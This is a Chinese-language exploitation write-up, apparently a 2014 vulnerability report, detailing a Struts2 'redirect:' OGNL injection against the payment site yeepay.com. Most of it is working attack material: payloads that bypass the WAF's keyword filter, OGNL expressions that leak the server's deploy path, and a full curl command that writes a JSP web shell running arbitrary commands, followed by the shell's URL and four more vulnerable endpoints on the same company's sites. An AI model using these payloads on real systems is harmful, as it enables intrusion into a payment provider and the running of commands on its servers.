http://www.yeepay.com/individualservice/Login.action看到action习惯性测试struts漏洞,http://www.yeepay.com/individualservice/Login.action?redirect:/xxoo
HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 08:34:12 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/xxoo
Content-Language: zh-CN
Set-Cookie: BIGipServerpool_css=2736695488.36895.0000; expires=Sat, 20-Dec-2014 8:49:12 GMT; path=/
1
2
3
4
5
6
7
8
HTTP/1.1302MovedTemporarily
Server:Tengine/2.0.3
Date:Sat,20Dec201408:34:12GMT
Content-Length:0
Connection:keep-alive
Location:http://www.yeepay.com/individualservice/xxoo
Content-Language:zh-CN
Set-Cookie:BIGipServerpool_css=2736695488.36895.0000;expires=Sat,20-Dec-20148:49:12GMT;path=/
咦,跳转了,有戏,果断上命令exp。最后却发现被waf拦截了。
不死心继续。。。测试发现waf过滤了allowStaticMethodAccess、processBuilder,命令执行无望,尝试能不能写shell。http://www.yeepay.com/individualservice/Login.action?java.io.File ---> is OKhttp://www.yeepay.com/individualservice/Login.action?java.io.PrintWriter --->is OK可以File操作,看来只针对命令执行的exp提取关键字添加规则进行过滤,对File操作是放行的。下面就开始写shell了。0x1 找web目录org.apache.catalina.jsp_classpath里面包含得有项目部署路径,可以从中找出来。由于yeepay web容器为jboss,对url长度好像有限制,所以需要截取(自己本地Tomcat测试则没有)。检索individualservice位置:
http://www.yeepay.com/individualservice/Login.action?redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27).indexOf(%22individualservice%22)}
HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 08:55:06 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/8232
Content-Language: zh-CN
1
2
3
4
5
6
7
8
http://www.yeepay.com/individualservice/Login.action?redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27).indexOf(%22individualservice%22)}
HTTP/1.1302MovedTemporarily
Server:Tengine/2.0.3
Date:Sat,20Dec201408:55:06GMT
Content-Length:0
Connection:keep-alive
Location:http://www.yeepay.com/individualservice/8232
Content-Language:zh-CN
位置为8232,substring调整长度:
curl -i http://www.yeepay.com/individualservice/Login.action -d 'redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27).substring(8100,8400)}'
HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 10:01:42 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/efault/tmp/deploy/tmp4813126319445231330servlets-default.jar:/export/home/jboss-4.0.3SP1/server/default/deploy/jbossweb-tomcat55.sar/:/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/:/export/home/jboss-4.0.3SP1/lib/gnu-regexp.jar:/export/home/jboss-4.0.3SP1/server/default/lib
Content-Language: zh-CN
Set-Cookie: BIGipServerpool_css=186558656.36895.0000; expires=Sat, 20-Dec-2014 10:16:42 GMT; path=/
1
2
3
4
5
6
7
8
9
curl-ihttp://www.yeepay.com/individualservice/Login.action -d 'redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27).substring(8100,8400)}'
HTTP/1.1302MovedTemporarily
Server:Tengine/2.0.3
Date:Sat,20Dec201410:01:42GMT
Content-Length:0
Connection:keep-alive
Location:http://www.yeepay.com/individualservice/efault/tmp/deploy/tmp4813126319445231330servlets-default.jar:/export/home/jboss-4.0.3SP1/server/default/deploy/jbossweb-tomcat55.sar/:/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/:/export/home/jboss-4.0.3SP1/lib/gnu-regexp.jar:/export/home/jboss-4.0.3SP1/server/default/lib
Content-Language:zh-CN
Set-Cookie:BIGipServerpool_css=186558656.36895.0000;expires=Sat,20-Dec-201410:16:42GMT;path=/
找到web目录: /export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war0x2 写shell
curl -i 'http://www.yeepay.com/individualservice/Login.action' -d 'redirect:${(%23a%3d(new%20java.io.PrintWriter(%22/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/lala.jsp%22)),%23a.write(%27%3C%25%40%20page%20import%3D%22java.io.*%22%20%25%3E%20%3C%25%20String%20cmd%20%3D%20request.getParameter(%22cmd%22)%3B%20String%20output%20%3D%20%22%22%3B%20if(cmd%20!%3D%20null)%20%7B%20String%20s%20%3D%20null%3B%20try%20%7B%20Process%20p%20%3D%20Runtime.getRuntime().exec(cmd)%3B%20BufferedReader%20sI%20%3D%20new%20BufferedReader(new%20InputStreamReader(p.getInputStream()))%3B%20while((s%20%3D%20sI.readLine())%20!%3D%20null)%20%7B%20output%20%2B%3D%20s%20%2B%22%5C%5Cr%5C%5Cn%22%3B%20%7D%20%7D%20catch(IOException%20e)%20%7B%20e.printStackTrace()%3B%20%7D%20%7D%20%25%3E%20%3Cpre%3E%20%3C%25%3Doutput%20%25%3E%20%3C%2Fpre%3E%27),%23a.close())%2b%23a}'
HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 10:04:00 GMT
Content-Length: 0
Connection: keep-alive
Location: http:[email protected]4
Content-Language: zh-CN
Set-Cookie: BIGipServerpool_css=2736695488.36895.0000; expires=Sat, 20-Dec-2014 10:19:00 GMT; path=/
1
2
3
4
5
6
7
8
9
curl-i'http://www.yeepay.com/individualservice/Login.action'-d'redirect:${(%23a%3d(new%20java.io.PrintWriter(%22/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/lala.jsp%22)),%23a.write(%27%3C%25%40%20page%20import%3D%22java.io.*%22%20%25%3E%20%3C%25%20String%20cmd%20%3D%20request.getParameter(%22cmd%22)%3B%20String%20output%20%3D%20%22%22%3B%20if(cmd%20!%3D%20null)%20%7B%20String%20s%20%3D%20null%3B%20try%20%7B%20Process%20p%20%3D%20Runtime.getRuntime().exec(cmd)%3B%20BufferedReader%20sI%20%3D%20new%20BufferedReader(new%20InputStreamReader(p.getInputStream()))%3B%20while((s%20%3D%20sI.readLine())%20!%3D%20null)%20%7B%20output%20%2B%3D%20s%20%2B%22%5C%5Cr%5C%5Cn%22%3B%20%7D%20%7D%20catch(IOException%20e)%20%7B%20e.printStackTrace()%3B%20%7D%20%7D%20%25%3E%20%3Cpre%3E%20%3C%25%3Doutput%20%25%3E%20%3C%2Fpre%3E%27),%23a.close())%2b%23a}'
HTTP/1.1302MovedTemporarily
Server:Tengine/2.0.3
Date:Sat,20Dec201410:04:00GMT
Content-Length:0
Connection:keep-alive
Location:http:[email protected]4
Content-Language:zh-CN
Set-Cookie:BIGipServerpool_css=2736695488.36895.0000;expires=Sat,20-Dec-201410:19:00GMT;path=/
shell地址: http://www.yeepay.com/individualservice/lala.jsp
存在同一问题其他站点应用:
http://www.yeepay.com/selfservice/requestRegister.action
http://m.yeepay.com/donategroup/PrintDonateCert.action
http://gongyi.yeepay.com/mlove/showMediaInfo.action
http://zht.yeepay.com/zhtservice/login.action
1
2
3
4
http://www.yeepay.com/selfservice/requestRegister.action
http://m.yeepay.com/donategroup/PrintDonateCert.action
http://gongyi.yeepay.com/mlove/showMediaInfo.action
http://zht.yeepay.com/zhtservice/login.action